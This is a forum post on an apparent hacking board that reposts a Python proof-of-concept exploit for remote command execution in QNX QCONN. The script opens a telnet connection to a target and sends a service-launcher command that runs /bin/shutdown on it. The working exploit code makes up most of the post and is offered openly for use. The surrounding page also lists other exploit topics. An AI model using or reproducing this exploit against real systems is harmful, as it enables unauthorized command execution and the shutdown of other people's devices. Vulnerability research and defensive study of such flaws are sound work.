OneAnonymous
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Run by Daz
 
HomeGallerySearchLatest imagesRegisterLog inRadio

 

 QNX QCONN Remote Command Execution

Go down 
AuthorMessage
Daz
Super Admin
Super Admin
Daz


Posts : 41
Points : 136
Join date : 2011-03-02

QNX QCONN Remote Command Execution Empty
PostSubject: QNX QCONN Remote Command Execution   QNX QCONN Remote Command Execution EmptySat Apr 13, 2013 8:35 am

QNX QCONN Remote Command Execution Screen-shot-2012-09-25-at-21324-pm

# Title : QNX QCONN Remote Command Execution Vurnerability
# Version : QNX 6.5.0 >= , QCONN >= 1.4.207944
# Download: http://www.qnx.com/download/feature.html?programid=23665 (QNX Neutrino 6.5.0 SP1)
# Vendor : http://www.qnx.com
# Date : 2012/09/09
# CVE : N/A
# Exploit Author : Mor!p3r(moriper[at]gmail.com)

import telnetlib
import sys

if len(sys.argv) < 3:
print " "
print " -----------------------------------------------------"
print " + Qconn Remote Command Execution PoC (Shutdown) +"
print " -----------------------------------------------------"
print " "
print " + Usage: QCONNRC.py <Target IP> <Port>"
print " + Ex> QCONNRC.py 192.168.0.1 8000"
print ""
sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
attack ="service launcher\n" + "start/flags 8000 /bin/shutdown /bin/shutdown -b\n" + "continue\n"
telnet = telnetlib.Telnet(host, port)
telnet.write(attack)
print "[+] Finish"
telnet.close()
Back to top Go down
https://oneanonymous.board-directory.net
 
QNX QCONN Remote Command Execution
Back to top 
Page 1 of 1
 Similar topics
-
» Nagios Remote Plugin Executor Arbitrary Command Execution
» Openfiler v2.x NetworkCard Command Execution
» MongoDB nativeHelper.apply Remote Code Execution
» vBulletin 4.0.0 Beta 5 Remote Denial of Service
» GroundWork monarch_scan.cgi OS Command Injection

Permissions in this forum:You cannot reply to topics in this forum
OneAnonymous :: Linux Exploits-
Jump to: